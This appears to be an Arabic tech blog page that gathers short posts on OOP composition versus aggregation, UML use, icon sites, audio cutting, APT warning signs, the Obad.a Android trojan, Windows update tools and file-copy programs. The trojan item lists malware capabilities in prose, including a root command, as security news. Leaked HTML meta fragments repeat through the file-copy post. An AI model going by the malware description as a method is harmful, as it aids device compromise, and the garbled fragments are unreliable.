ما الفرق بين ال Composition و ال Aggregation

02:54 | | | 0تعليقات
عالم البرمجه له كثير من الأوجه أو الأقسام programming paradigm منها البرمجه الإجرائيه procedural programming مثل لغه السي والباسكال (البعض يطلق عليهم imperative language) ، نوع أخر وهي الFunctional programming وهي تختلف عن الإجرائيه مثل لغه ليسب فالبرمجه هنا تستخدم مفهوم الlist بشكل كبير وتختلف طريقه كتابه البرامج عن الطريقه المعروفه بالاضافه الى وجود بعض نقاط تشابه بين هذا النوع والimperative ،، وجه أخر من أنواع البرمجه وهي البرمجه الكائنيه object oriented programming وهو يعتبر من أفضل الparadigm وخاصه في البرمجيات التجاريه والسبب أن استخدام هذا الأسلوب يسهل في حل المشكله بنسبه كبيره لأننا سنحاول تقليد العالم الحقيقي من خلال كائنات تشابه تلك الكائنات التي نحاول وضع حل لمشكله لها ..
بشكل عام كيفيه استخدام البرمجه OO واستخدام المفاهيم الرئيسيه مثل الوراثه inheritance وتعدد الأوجه polymorphism والعموميه generic والكبسله وغيرها أمر ليس بتلك الصعوبه ويستطيع المبتدئ تعلمها في غضون أيام ،وتبقى المشكله في كيفيه معرفه متى يمكن أن تستخدم الشيء القلاني هو الموضوع الصعب ، مثلا كيف تقوم بعمل كلاس عمليه بسيطه في أي لغه ، ولكن مثلا كم كلاس ستقوم لبرمجه نظام Bank Account ، وما هي نوعيه العلاقات بين هذه الكلاسات ، ومن هو الكلاس الرئيسي الذي ينشئ البقيه ، ولماذا الكلاس الأخر يحتوي على متغير من هذا النوع ، هل يمكن جعل هذا المتغير كلاس قائم بذاته وووو الكثير من الأمور وهي مختصه بموضوع التحليل والتصميم الكائني Object Oriented Analysis & design.
بعد تمكنك من فهم أساسيات موضوع OOAD فتكون أنجزت نصف الطريق ،، فما زلت عند طلب برنامج متكامل ستواجهه صعوبه في اتباع طريقه منطقيه لكل تبدأ من البدايه في كتابه البرنامج الى النهايه وبشكل ملائم لمتطلبات العميل وفي الوقت المحدد in deadline والcost المناسب .. وهنا يكمن أهميه الProcess أو الMethodology المستخدمه لتطوير البرنامج وهناك الكثير من المنهجيات ودائما في عالم الOO نفضل الincrement-iterative لأنها تسمح للعميل بأن يغير متطلباته بلا مشاكل ، وفي كل دوره بسيطه في المشروع -قد تكون من اسبوعين الى شهرين- نقوم بعرض اصدار جديد من المشروع يحتوي على ميزه جديده ، وهكذا في كل دوره يكبر المشروع الى وقت التسليم ،، وكل هذا بمشاهده العميل ومرافقته لكل الأحداث وبالتالي نضمن عدم رفض العميل للمشروع أو احداث تغيير كبير جدا لأنه كان مرافق لعمليه التطوير ،،
هناك الكثير من الprocess المستخدمه مثل RUP و eXtreme Programming وهي أحد أبناء الAgile وهناك الripple وغيرها من الطرق والمنهجيات والتي يفضل أن تستخدم كل واحده في حاله من الحالات تكون هي الأفضل عن غيرها ،، سوف نتحدث قريبا عن هذا الموضوع بشكل موسع للغايه ان شاء الله بموضوع Object Oriented Software development ، وحاليا سنركز على جزئيه الكائنات ونصف أحد أهم العلاقات بين الكائنات وهي العلاقه Composition و العلاقه aggregation ونعرف الفرق بينهم ،، ونترك بقيه العلاقات (الوراثه inheritance و Association) والتفاعل بين الكائنات للموضوع الذي سنطرح فيما بعد بمشيئه الله ..
سبب طرحي للموضوع بشكل منفصل هو وجود لبس لدى البعض في معرفه الفرق بين الComposition والAggregation واستخدام مصطلحات ركيكه للتفرقه بينهم ، ومن هنا كان هذا المقال ،،
في البدايه وبشكل عام ، لا يوجد فرق كبير من الComposition والAggregation حيث يعني هذا النوع من العلاقات بعلاقه أحتواء أو علاقه Has-A بمعنى كائن يحتوي على كائن ،، لنأخذ مثال السياره تحتوي على عده كائنات مثلا محرك السياره والماكينه ودواسه الوقود ووو كل هذه المكونات مع بعض تكون ما يسمى بالسياره .. أي أن السياره “تحتوي” على جميع هذه المكونات ..
مثال أخر جهاز الحاسب Computer يحتوي على عده مكونات وهي الذاكره RAM والمعالج CPU ومزود الطاقه Power Supply واللوحه الأم motherboard ووو غيرها من المكونات ،،
وبالطبع بما أن لكل مكون من هذه المكونات خصائص وسمات خاصه به فأننا لن نستطيع استخدام متغيرات عاديه primitive data type لوصف هذه المكونات ، أي أننا لا تستطيع أن نقوم بعمل متغير int لكي يمثل الذاكره أو المعالج لأن لكل من هذه المكونات وظيفه خاصه فيه ومتغيرات Internal بها خصائص هذا المكون ،، وبالتالى سيكون أي مكون من هذه المكونات عباره عن كائن من كلاس يمثل Model هذا المفهوم .. (ملاحظه : الكلاس هو Model فقط أو عباره عن قالب blue-print ومن خلاله نقوم بعمل كائنات Objects من هذا الكلاس ) .
ملاحظه مهمه /
ابتعد تماما عن ترجمه أي مصطلح مهما كان حتى لا تدخل في مشاكل في الفهم أنت في غني عنها ،، فمثلا سوف تجد في الكتب من يقول أن علاقه compoisition هي has-a وستجد من يقول هي use-a وستجد وستجد .. لذلك دع جميع هذه المصطلحات وقم بفهم العلاقه فقط وقم بصياغتها بطريقتك الخاصه ..
بنفس الأمر هناك من يفرق بين الobject والobject instance !! مع أن العبارتين تعني عمل كائن من الكلاس ولا يوجد أي فرق بينهم .. ولكن محاوله الترجمه الحرفيه كما ذكرت سيدخلك في مشاكل أنت في غني عنها ،،
نعود للComposition والAggregation ،، كما ذكرنا أنهم علاقه أحتواء (كائن يحتوي على كائن) فقط .. لكن هناك فرق بسيط بينهم (لدرجه أن هناك كتب ومقالات تتجاهل هذا الفرق عندما يتحدث عن التصميم بشكل High level ، لأنه فرق بسييط جدا)..
الفرق هو أن الكلاس الذي يحتوي على بقيه الكائناتComposition هو المسؤول عن عمليه انشاء هذه الكائنات وعمليه انهائها ، ونقصد هنا هو المسؤول عن حجز مواقع لهذه الكائنات في الذاكره ، وهو المسؤول عن تحرريها ، بمعني أوضح أن الكلاس الكبير بمجرد انشائه سيتم انشاء جميع المكونات (الكائنات) بداخله ،، وبمجرد أنتهاء الكلاس الكبير سيتم فورا انهاء جميع الكائنات بداخله ،، لنأخذ مثال السياره لكي نوضح القصد ، هل يمكن أن تصبح السياره سياره بعد أخذ المحرك منها أو الماكينه ؟ بالطبع لأ .. اذا الكلاس الكبير لن يتم انشائه الا اذا تمت انشاء جميع ما يحتويه من كائنات .. لذلك يطلق على علاقه Composition بعلاقه قويه Strong Relationship .
النوع الأخر وهو الAggregation وهو أيضا علاقه احتواء ولكن في هذه الحاله الكلاس الكبير هو غير مسؤول عن انشاء الكائنات (أي حجز موقع في الذاكره لها) وغير مسؤول عن عن تحرريها ،، اضافه الى أنه تم انهاء الكائن الكبير فهذا قد لا يؤثر على المكونات بداخله وقت تعمل بعد ذلك ،، مثلا قسم في جامعه يحتوي على عدد من المدرسين ، في حال تم نقل القسم أو الغائه فلن يتم الغاء المدرسين الذين عملوا بالقسم بل سيكونوا موجودين وربما ينتقلوا لقسم أخر أو جامعه أخرى ..
الى هنا وقد يكون الفرق غير واضح بينهم ، لكن بقليل من الكود سيتضح المقصود بذلك ، وسوف تتفاجئ بأنك كنت تستخدم أحد النوعين بكثره في برامجك ، وربما كنت تستخدم طريقه hybrid أي تستخدمهم مع بعض في نفس الوقت !
نبدأ بقليل من الكود لكي نوضح الفكره ، بالاضافه لتوضيح كيف يتم رسم هذه العلاقات باستخدام UML .
لنبدا الcomposition ، كما ذكرنا أن الكائن هو المسؤول عن جميع الكائنات بداخله وهو يتولى عمليه انشائها وانهائها ، بالتالي تكون هذه الكائنات موجوده لديه ، مثلا لنعد لعلاقه المحرك والسياره وننظر لمقطع الكود التالي (قد نستخدم في بقيه الأمثله نموذج خليط بين كود سي++ وجافا ، فالغرض من الموضوع توضيح النظريه والفكره وليس التطبيق الفعلي) :
بالنظر للكود ستجد أن Car هو سينشئ الEngine وبانتهاء Car سينتهي Engine ،، وهذا كل ما في موضوع الcomposition ، ويتم رسمه في UML باستخدام معين مغلق (ربما للدلاله على الصرامه :) )
composition
بالنسبه للaggregation ، نأخذ مثال شخص person مع عنوانه ،، وسنجد أنه بانتهاء هذا الشخص فأن العنوان موجود وربما نقوم باعطائه لشخص أخر فيما بعد ،، ننظر للمقطع التالي :
بالنظر للمثال أعلاه سنجد أن بعد عمل person ، وانتهائه (لأنه خرج من الscope الذي عرف فيه) أن العنوان ما زال موجودا ويمكن أستخدامه مره ،، وهو ما يعرف بaggregation . وفي UML يكون بمعين لكن بدون لون ويدل على خفه العلاقه weak relationship …
aggregation
مثال أخر لكي تتضح الفكره :

وهنا سنجد أن Department أحتوى على مؤشرات لProfessor وبالتالي لن يكون مسؤولا عن انشائه ، وهنا تكون العلاقه بين الDepartment واللProfessor هو aggregation ، بعكس الDepartment والUniversity حيث الأخيره تحتوى على عدد من الأقسام ،، وهي المسؤوله عن انشائهم وانهائهم ..
Aggregation-Composition3
أخيرا ستجد كم من المصطلحات لوصف هذه العلاقات ولكل منها معني قد يشوشك في حاله الترجمه ، فمن يقول بأن الcomposition يسمى Composition / Composition Aggregation ، و Aggregation يسمى Shareable Aggregation . وهناك مسمى بأن الcomposition هو Aggregation by value (والسبب أن الكلاس الكبير قد يأخذ قيمه value ويضعها في المكونات ولكنه هو المسؤول عن انشائهم وكانها شبيه بالتمرير بالقيمه) ، والAggregation هو Aggregation by reference (بمعني أن القيمه المرره للكلاس الكبير للمكونات هي موقع في الذاكره reference وأنه فقط سجعل تلك المكونات تؤشر لهذه القيم بالذاكره) .، ولكنها في النهايه هي مصطلحات من منظور شخص معين ، يمكنك بعد قرائتك للدرس وفهمك أن تخترع مصطلحاتك الخاصه اذا أردت .. لذلك تعامل مع المفهوم والعلاقه بشكل مبسط واترك ترجمه المصطلحات فقط بكل بساطه
تابع القراءة Résuméabuiyad

كيف تُستخدم ال UML بشكل صحيح ؟

02:52 | | | 0تعليقات
كون أن لغه UML لها مقياس Standard وهناك جهه (ال ISO) تتولى الاهتمام بذلك، الا أن هذا لا يعارض وجود أكثر من استخدام لها أثناء فترة تطوير المشروع، وهذا الاختلاف بين طرق الاستخدام قد يدخلك في صراع أو نقاشات مطوله خصوصاً لو عملت مع شخص يستخدمها بطريقة ما ولا يدري الطرق الاخرى التي يمكن ان تكون لل UML فائده منها.
سأتحدث عن طريقتين الآن الأولى وهي توضيح كل العلاقات والكلاسات وبما داخلها بشكل مفصل جداً (سوف نسمية Blueprint) ، أما الثانية وهو توضيح جزء معين من تصميم المشروع Designing فقط بدون حتى الدخول في تفاصيله الدقيقة (سوف نسميه Sketch )
هذه الطرق يمكن ان تستخدمها قبل كتابه المشروع Forward Engineering، أو بعد كتابه المشروع Reverse Engineering، ولكل منها سبب،
لنتحدث عن طريقة عمل التفاصيل لكل شيء وهي المفضلة لدى المناهج الأكاديمية Blueprint فمثلاً يقوم الطالب أو المبرمج بعمل المشروع بالكامل ومن ثم في الأخير يقوم بتوليد أو رسم ال UML لهذا المشروع (هنا فائده ال UML أصبحت قليله والسبب أن المشروع انتهي والتوثيق ورسومات ال UML قد تكون اعقد من الكود نفسه) ، لذلك في غالب مشاريع تخرج الطلاب نجد أنهم يتبعوا Reverse Engineering Blueprint. الطريقة الأخرى في ال Blueprint وهي أن تقوم بعمل ال UML قبل المشروع، وهي لها فوائد مثلاً كنت مبرمج محترف ولديك مبرمج مبتدئ تريده أن يعمل فيمكن أن تقوم بعمل Forward Engineering وعمل ما يلزم لهذا المبرمج حتى يستطيع العمل والبرمجة بمفرده.
في الغالب القيام بعمل التفاصيل Blueprint يستلزم أدوات لتوليدها سواء كانت ضمن بيئتك البرمجية IDE أو أداة خارجية Third-Party تقوم بها (سواء قبل Forward أو بعد المشروع Reverse). الكتب الأكاديمية تسمى هذه الأدوات CASE Tools وقد سمى هذا المصطلح Martin Fowler (مهندس البرمجيات المعروف) بال Dirty Word وأن كثير من الشركات والمصنعين Vendors أصبحوا لا يستخدمونه ، واتفق معه في ذلك  ..
الطريقة الثانية للاستخدام UML وهو ما افضله واستخدمه وهو رسم ما يلزم لايصال الفكرة بدون الحاجه للدخول في التفاصيل Sketch. مثلاً كنت تريد ان تحل مشكلة عمل فهرسه للملفات فسوف تقوم بوضع ال High Level Design مع الفريق أو مع نفسك ومن ثم ترى هل سيحل هذا التصميم المشكلة ؟ فاذا كان كذلك والا فتقوموا بالتعديل عليه الا حين الوصول للشيء المناسب (طريقة الاستخدام هذه Forward Sketch تصلح ايضاً في اجتماعات المبرمجين في الفريق )، أو مثلاً لنقل أنك انهيت حل مشكلة ما وتريد توثيق الDesign أو أن هناك مبرمج جديد انضم وتريد شرح الفكرة العامه من هذا الاجزاء من الكود فال Reverse Sketch هنا أيضاً مفيد في تلك الحالة.
uml
عندما تقوم بال Sketcher فقد لا تلتزم بأي Standard للرسم ، بمجرد أن تصل فكرتك المطلوبة للفريق وهذا هو الهدف Communication Ideas فهذا يكفى ولو لم تكن مطابق لل UML Standards (الصورة المرفقة توضح Sketch قديم قمت بعمله وهو يوضح فكرة معينة بغض النظر عن الالتزام الحرفي بالمعيار وطريقة الرسم).
فأسأل نفسك هل انت Sketcher أم Blueprinter ، ولا تتعصب لطريقة واستخدم كل منها في الوقت المناسب.
تابع القراءة Résuméabuiyad

أفضل مواقع لتحميل الأيقونات

15:49 | | | 0تعليقات

أفضل مواقع لتحميل الأيقونات




                            1-IconsPedia.com 

                   2-
FreeIconsWeb.com 



               3 - موقع     VistaIcons.com 



4 - موقع PixelgirlPresents



5 - موقع Icon Archive



6 - موقع
PlanetIcons



7 - موقع
OpenWebGraphics.com



8 - موقع
Icon Stick



9 - موقع
IconShock




10 - موقع
FindIcons



11 - موقع
Icons Etc





12 - موقع
Icon factory





13 - موقع
Dry icons





14 - موقع
Free icons Download





15 - موقع
Best Free icons



تابع القراءة Résuméabuiyad

طريقة تقطيع المقاطع الصوتية والنغمات أونلاين وبدون برامج

15:46 | | | 0تعليقات

طريقة تقطيع المقاطع الصوتية والنغمات أونلاين وبدون برامج


طريقة تقطيع المقاطع الصوتية والنغمات أونلاين وبدون برامج


عندما تكون تستمع لأغنية جميلة أو لحن موسيقي أو حديث يهمك، قد يعجبك مقطع من الأغنية أو اللحن أو الحديث، وترغب بأخذ هذا المقطع وحفظه بشكل مستقل عن الملف الصوتي الذي تستمع إليه، وغالباً يكون هذا من أجل وضع النغمات القصيرة للهاتف المحمول.
قد تكون أحد الحلول السريعة والفعالة والسهلة، استخدام أحد المواقع التي تقدم هذه الخدمة أونلاين دون تنزيل أي برنامج على الحاسب، وللاستفادة من هذه الخدمة اتبع التعليمات التالية:
  • اذهب إلى موقع MP3Editor.
  • اضغط على زر Select MP3 File، ثم اختر ملف صوتي على أن تكون لاحقته mp3.
  • شغل الملف الصوتي من الموقع، ثم حدد الجزء الذي تريد أن تقتطعه من خلال السحب باستخدام الفأرة من المكان الذي تريد البدء فيه إلى المكان الذي تريد الانتهاء عنده، وبعد ذلك اسمتع إليه لتتأكد من دقة اختيارك.
  • عند التأكد من المقطع الذي تريده تماماً، اضغط على زر Cut MP3 File.
  • بعد معالجة المقطع، يعرض عليك الموقع خيار Save to Mobile و Save to Disk، اختر الخيار الثاني إذا كنت تريد حفظ المقطع الذي اخترته على حاسبك مباشرةً.
وهكذا تستطيع ببساطة أن تحصل على مقطعك المفضل من الملف الصوتي، كما أن هناك العديد من المواقع الأخرى المتاحة على شبكة الإنترنت التي تقدم لك هذه الخدمة أيضاً.
تابع القراءة Résuméabuiyad

فورتينت: أفضل 'طريق للكشف عن الهجمات الإلكترونية'

15:40 | | | 0تعليقات

فورتينت: أفضل 'طريق للكشف عن الهجمات الإلكترونية'


فورتينت: أفضل المعايير للكشف عن الهجمات الإلكترونية
لا يختلف المتخصصون في مجال أمن المعلومات على أن المنهجية الآمنة لاختبار التهديدات المستمرة المتقدمة (APTs) المحتملة تكمن في توفر قدرات محلية وسحابية عالية الأداء لاختبار البرمجيات وذلك في إطار استراتيجية أمنية موحدة. لكن كيف يتم تحديد الهجمات الفورية المحتملة؟
قامت شركة “فورتينت” الأمريكية المتخصصة في توفير أجهزة أمن الشبكات، بتصنيف القائمة التالية لأهم خمس تهديدات أولية وسلوكيات خطرة من المرجّح أن تتسبب في هجوم للتهديدات المستمرة المتقدمة.
1- الإنشاء العشوائي لعناوين بروتوكول الإنترنت IP: بعض حمولات التهديدات المستمرة المتقدمة تتضمن شيفرة تقوم وبشكل عشوائي بإنشاء سلاسل لعناوين بروتوكول الإنترنت، وذلك من أجل المساعدة على الإنتشار والتكاثر.
2- محاولات الاتصال للسيطرة والتحكم: عندما تتمكن من التسلل، فإنه قد يتم اختيار التهديدات المستمرة المتقدمة للإتصال مع خادم السيطرة والتحكم من أجل تسريب البيانات أو الإشارة إلى مزيد من مصادر الهجوم، أي عن طريق الفيروسات الشبكية، حيث تستند عملية الكشف عنها على تعريفات الرقابة والتحقق الفوري.
3- تقليد الجهاز المُضِيف: قد تبدأ الهجمات المستمرة المتقدمة بتقليد سلوك الجهاز أو التطبيق المضيف لها في محاولة لتفادي عملية الكشف.
4- تشويش جافا سكريبت: شملت حالات التهديدات المستمرة المتقدمة الموثقة العديد من التقنيات لحجب المعنى الحقيقي والغرض من وراء شيفرة جافا سكريبت الخبيثة.
5- مرور البيانات المشفر: إن التوجه نحو البرمجيات الخبيثة المشفرة ضمن حمولات التهديدات المستمرة المتقدمة يُعرّض عملية مرور البيانات المشفرة لمخاطر مرتفعة.
وقالت “فورتينت” إنه يمكن للشركات الحذرة تجاه الهجمات الأمنية الفورية لتكنولوجيا المعلومات أن تستفيد اليوم من آخر ما تم التوصل إليه فيما يتعلق بالحماية من التهديدات المتقدمة وذلك من خلال نظام التشغيل الجديد “فورتي أو أس 5″ (FortiOS 5)
ويشتمل نظام التشغيل “فورتي أو. أس 5″، 
الذي تم إطلاقه أواخر العام الماضي، على أكثر من 150 ميزة متقدمة تم تصميمها لمواجه التحديات الأمنية الحالية والناشئة التي تعترض المؤسسات التي تعاني من وجود المزيد من الأجهزة والتطبيقات النقالة. وضمن ترسانتها لمواجهة التهديدات المستمرة المتقدمة، أضافت “فورتينت” قدرات اختبار داخلية وسحابية من أجل اختبار البرمجيات الخبيثة غير المعروفة واستكمالاً لمعالجها الفريد “لغة تعريف النموذج المدمج” (Compact Pattern Recognition Language)،
 الذي يتيح للتعريفات المستقلة تغطية أكثر من 50.000 فيروس مختلف بما في ذلك الهجمات الفورية.
تابع القراءة Résuméabuiyad

حصان طروادة” بالغ التعقيد يهاجم “أندرويد”

15:39 | | | 0تعليقات

حصان طروادة” بالغ التعقيد يهاجم “أندرويد”


"حصان طروادة" بالغ التعقيد يهاجم "أندرويد"
كشفت “كاسبرسكي لاب” عن برمجية خبيثة من نوع “حصان طروادة” بالغة التعقيد، تهاجم الأجهزة العاملة بنظام تشغيل “أندرويد”، ويطلق عليها اسم “Backdoor.AndroidOS.Obad.a”. ويمكن لحصان طروادة هذا تنفيذ العديد من المهمات الخبيثة، مثل إرسال رسائل نصية “SMS”، و تحميل و تنصيب العديد من البرمجيات الضارة، بالإضافة إلى قدرته على تنفيذ الأوامر عن بعد.
وحسب خبير من “كاسبرسكي لاب” فإن حصان طروادة “Obad.a” يشبه من حيث أسلوب عمله البرمجيات الخبيثة الخاصة بنظام التشغيل “ويندوز”, وذلك أكثر من كونه حصان طروادة خاص بنظام أندرويد، لأنه يستغل عدداً من الثغرات الأمنية غير المعلن عنها و التي تعتبر شديدة التعقيد.
وبحسب تقرير الشركة، يقوم “Obad.a” بافتعال خطأ في ملف “DEX2JAR”، و الذي يُعد جزءًا من برنامج متخصص في تحويل ملفات “APK” إلى ملفات “JAR”، وبسبب هذا الخطأ يصبح القيام بإحصاءات وتحاليل عن “Obad.a” غاية في الصعوبة.
علاوةً على ذلك، يقوم “Obad.a” باستغلال ثغرة أمنية في نظام تشغيل “أندرويد”، مما يساعده في الحصول على سماحيات إدارية تجعل حذف التطبيقات الخبيثة من الجهاز أمراً في غاية الصعوبة. كما أنه يعمل في الخلفية و ليس له أي واجهة مرئية.
وحسب “كاسبرسكي لاب”، عندما يهاجم “Obad.a” الجهاز، فإنه يقوم فورًا بمحاولات للحصول على السماحيات الإدارية ليقوم بعدها بإيقاف تشغيل شاشة الجهاز لمدة 10 ثوان، يتصل خلالها الجهاز بشبكات “Wi-Fi” غير الآمنة المتوفرة في الجوار أو عن طريق “البلوتوث” و يقوم بإرسال ملفات خبيثة إلى الأجهزة التي يكتشفها في جواره. كما يستغل “Obad.a” الأمر “su id” للحصول على صلاحيات مدير النظام.
ليقوم “Obad.a” بعد ذلك بجمع معلومات مختلفة عن الجهاز، مثل عنوان الشبكة 
اللاسلكية الخاص بالجهاز، واسم المستخدم، ورقم الهاتف، وغيرها من المعلومات ليقوم بإرسالها إلى مُخدِم الأوامر و التحكم الخاص به. كما يتلقى “Obad.a” بدوره أوامر من المُخدِم ليقوم بإرسال رسائل نصية إلى أرقام محددة، وحذف رسائل، بالإضافة إلى تحميل ملفات، والإتصال بعناوين محددة، وإرسال قائمة بالتطبيقات التي تم تنصيبها على الجهاز، وجمع معلومات الإتصال، وتنفيذ أوامر وإرسال ملفات عبر “البلوتوث”.
ويقول خبراء أن البرمجيات الخبيثة المعقدة التي ظهرت حديثًا تُعد مؤشر على ازدياد متوقع في أعداد مثل هذه البرمجيات في المستقبل.
تابع القراءة Résuméabuiyad

برنامج لحفظ تحديثات ويندوز على ذاكرة فلاش وتثبيتها على أكثر من حاسب

15:35 | | | 0تعليقات

برنامج لحفظ تحديثات ويندوز على ذاكرة فلاش وتثبيتها على أكثر من حاسب


في حال امتلاك المستخدم لأكثر من حاسب فإن عملية التحديث قد تؤدي إلى استهلاك في الشبكة أو الوقت. 
 
 
تصدر تحديثات لنظام تشغيل ويندوز بشكل متكرر وقت تكون الفترات بين التحديثات قصيرة، وفي حال امتلاك المستخدم لأكثر من حاسب فإن عملية التحديث قد تؤدي إلى استهلاك في الشبكة أو الوقت.
يمكن استخدام برنامج “PortableUpdate” المجاني الذي يقوم بحفظ التحديثات على ذاكرة خارجية “فلاش” ومن ثم تثبيتها على بقية الحواسب.
بعد تنزيل البرنامج، نقوم بفك ضغطه وحفظ الملفات الناتجة على أي ذاكرة خارجية، بعدها نقوم بتشغيل البرنامج والضغط على زر “Start”، ليقوم بالبحث عن التحديثات وحفظها على الذاكرة، وعند وصل الذاكرة في أي حاسب جديد نقوم فقط بتشغيل البرنامج والضغط مرة جديدة على زر “Start” ليقوم بتثبيت التحديثات بشكل آلي.
تابع القراءة Résuméabuiyad

أفضل 5 برامج لتسريع نقل الملفات

15:32 | | | 0تعليقات

أفضل 5 برامج لتسريع نقل الملفات


عندما تقوم بنقل ملف او نسخه داخل جهازك من مكان الي اخر فربما تتحول عملية النسخ الي كابوس بسبب البطئ او "التهنيج" خاصاً في ويندوز 7 وويندوز اكس بي ، وربما تكون اداة الويندوز الخاصة بالنقل في ويندوز 8 جيدة الي حد ما بسبب امكانية ايقاف النسخ او القص ثم اعادة استكماله مرة اخري. ولكن بشكل عام اداة الويندوز الخاصة بالنسخ والقص سيئة الي حد كبير. ولكن من حسن الحظ أن هناك بدائل لهذه الاداة من برامج مميزة تستخدم لنقل الملفات داخل جهازك بشكل اسرع مما يجعل عملية النقل افضل واسرع وبها مميزات اكثر. لذلك من خلال هذا الموضوع سوف نقوم باستعراض 5 من افضل الادوات والبرامج التي يمكنك استخدامها كبديل لاداة الويندوز لتسريع عملية نقل الملفات علي جهازك. تابع بعد الفاصل..
بالتأكيد نقل الملفات صغيرة الحجم او قصها من مكان الي اخر علي الهارد الخاص بك او من الهارد الي الفلاش ميموري ربما لن يكون امر صعب بالنسبة لاداة الويندوز. ولكن ماذا اذا قمت بنقل ملفات كبيرة الحجم من مكان الي اخر ، بالتأكيد هنا ستلاحظ بسهولة أن اداة الويندوز عجزت عن ذلك ويبدأ التهنيج او البطئ وغيره من الاشياء التي نعرفها جميعاً. لذلك من خلال السطور بالاسفل نستعرض مجموعة مكونة من 5 برامج مميزة لتسريع نقل ملفات الجهاز بسهولة وهذه البرامج صغيرة الحجم ولا تستهلك موارد جهازك لذلك لا داعي للقلق فهي بديل رائع لاداة الويندوز.

1 - برنامج TeraCopy


موقع المحترف للمعلوميات عبارة عن مدونة تضم عدد كبير من المواضيع في شتى مجالات التقنية والإعلاميات في قالب مقالات ،نتطرق فيها إلى مختلف المواضيع القريبة من الشباب العربي ، هذا الأخير الذي نهدف إلى تطوير مهاراته وزيادة معارفه فيما يخص تكنولوجيا الإعلاميات . مدونة  المحترف للمعلوميات تأسست سنة 2012 حيث تستقطب الآن عدد لابأس به من الزوار من كافة ربوع الوطن العربي ، و مقرها الرئيسي بالمغرب ومديرها عبد الحكيم الحماني، ويندوز ، لينكس ، فيديو  ، انترنت ، اخبار' name='keywords'/> <meta content='internet,gratuit,طريقة الربح من الانترنت,احصل على دومين مجاني,انترنت,سيرفر,الفيس بوك,imedia,للمعلوميات,pes 2013,المحترف,mobilezone,جديد موبيل زون 2013,ماستر كارد

برنامج TeraCopy هو يعتبر افضل برنامج لتسريع نقل الملفات وبديل ممتاز لاداة نقل الملفات في الويندوز. فالبرنامج يتيح لك امكانية ايقاف او استكمال نقل الملفات كما تريد. فالبرنامج يتيح لك امكانية تسريع نقل الملفات الي السرعة القصوي. وعند حدوث اي خطأ ما فـ لن يتم الغاء العملية او حدوث تهنيج في الجهاز بل سيقوم بالمحاولة عدة مرات ثم يتم تجاوز نقل الملف. كما انه يوفر بيانات ومعلومات اكثر عند نقل عدة ملفات بشكل سلس ورائع. بالفعل هذا البرنامج هو الخيار والبديل الافضل لنقل ملفاتك داخل الجهاز.  ( تحميل البرنامج )

2 - برنامج ExtremeCopy


موقع المحترف للمعلوميات عبارة عن مدونة تضم عدد كبير من المواضيع في شتى مجالات التقنية والإعلاميات في قالب مقالات ،نتطرق فيها إلى مختلف المواضيع القريبة من الشباب العربي ، هذا الأخير الذي نهدف إلى تطوير مهاراته وزيادة معارفه فيما يخص تكنولوجيا الإعلاميات . مدونة  المحترف للمعلوميات تأسست سنة 2012 حيث تستقطب الآن عدد لابأس به من الزوار من كافة ربوع الوطن العربي ، و مقرها الرئيسي بالمغرب ومديرها عبد الحكيم الحماني، ويندوز ، لينكس ، فيديو  ، انترنت ، اخبار' name='keywords'/> <meta content='internet,gratuit,طريقة الربح من الانترنت,احصل على دومين مجاني,انترنت,سيرفر,الفيس بوك,imedia,للمعلوميات,pes 2013,المحترف,mobilezone,جديد موبيل زون 2013,ماستر كارد

برنامج ExtremeCopy هو برنامج سهل الاستخدام ومجاني بواجهه بسيطة للغاية. البرنامج يقوم بتسريع نقل الملفات بسرعة تزيد عن اداة الويندوز بـ 20-120% ، مما يعني سرعة اكبر في نقل الملفات. وايضاً الاخطاء التي تتسبب ايقاف نقل الملفات لا تحدث مع هذا البرنامج. كما أن البرنامج يقوم بحساب وقت النقل بدقة شديدة ، فاذا كانت تفاصيل النقل لملف ما هي 10 دقائق فـ هذا يعني انها 10 دقائق تماماً. كما أن البرنامج يندمج مع الويندوز ليصبح جزء منه ويتم التحميل به بشكل آلي. برنامج مميز ايضاً. ( تحميل البرنامج تقوم بالضغط علي Download حسب نسخة الويندوز لديك سواء 32 بت او 64 بت )

3 - برنامج SuperCopier 


موقع المحترف للمعلوميات عبارة عن مدونة تضم عدد كبير من المواضيع في شتى مجالات التقنية والإعلاميات في قالب مقالات ،نتطرق فيها إلى مختلف المواضيع القريبة من الشباب العربي ، هذا الأخير الذي نهدف إلى تطوير مهاراته وزيادة معارفه فيما يخص تكنولوجيا الإعلاميات . مدونة  المحترف للمعلوميات تأسست سنة 2012 حيث تستقطب الآن عدد لابأس به من الزوار من كافة ربوع الوطن العربي ، و مقرها الرئيسي بالمغرب ومديرها عبد الحكيم الحماني، ويندوز ، لينكس ، فيديو  ، انترنت ، اخبار' name='keywords'/> <meta content='internet,gratuit,طريقة الربح من الانترنت,احصل على دومين مجاني,انترنت,سيرفر,الفيس بوك,imedia,للمعلوميات,pes 2013,المحترف,mobilezone,جديد موبيل زون 2013,ماستر كارد

برنامج SuperCopier بديل اخر شهير لاداة الويندوز ، ولكن انا لست ممن ينصحوا بـ هذا البرنامج واعتقد انه بطئ نوعاً ما ولكنه يبقي بديل مميز وشهيرة ومستخدم من قبل العديد من المستخدمين. فـ هو عبارة عن اداة لنقل الملفات علي جهازك بشكل سريع ويمكنك ايقاف واستكمال النقل. ( تحميل البرنامج )

4 - برنامج FastCopy


موقع المحترف للمعلوميات عبارة عن مدونة تضم عدد كبير من المواضيع في شتى مجالات التقنية والإعلاميات في قالب مقالات ،نتطرق فيها إلى مختلف المواضيع القريبة من الشباب العربي ، هذا الأخير الذي نهدف إلى تطوير مهاراته وزيادة معارفه فيما يخص تكنولوجيا الإعلاميات . مدونة  المحترف للمعلوميات تأسست سنة 2012 حيث تستقطب الآن عدد لابأس به من الزوار من كافة ربوع الوطن العربي ، و مقرها الرئيسي بالمغرب ومديرها عبد الحكيم الحماني، ويندوز ، لينكس ، فيديو  ، انترنت ، اخبار' name='keywords'/> <meta content='internet,gratuit,طريقة الربح من الانترنت,احصل على دومين مجاني,انترنت,سيرفر,الفيس بوك,imedia,للمعلوميات,pes 2013,المحترف,mobilezone,جديد موبيل زون 2013,ماستر كارد
برنامج FastCopy هو بديل اخر مميز لاداة الويندوز حيث انه سريع ومميز وصغير الحجم ويمتلك واجهه بسيطة الاستخدام. البرنامج لا يقوم باستهلاك الرام لذلك لا داعي من القلق حيث انه لا يسبب بطئ في الجهاز. ( تحميل البرنامج 64 بت - 32 بت )

5 - برنامج Copy Handler


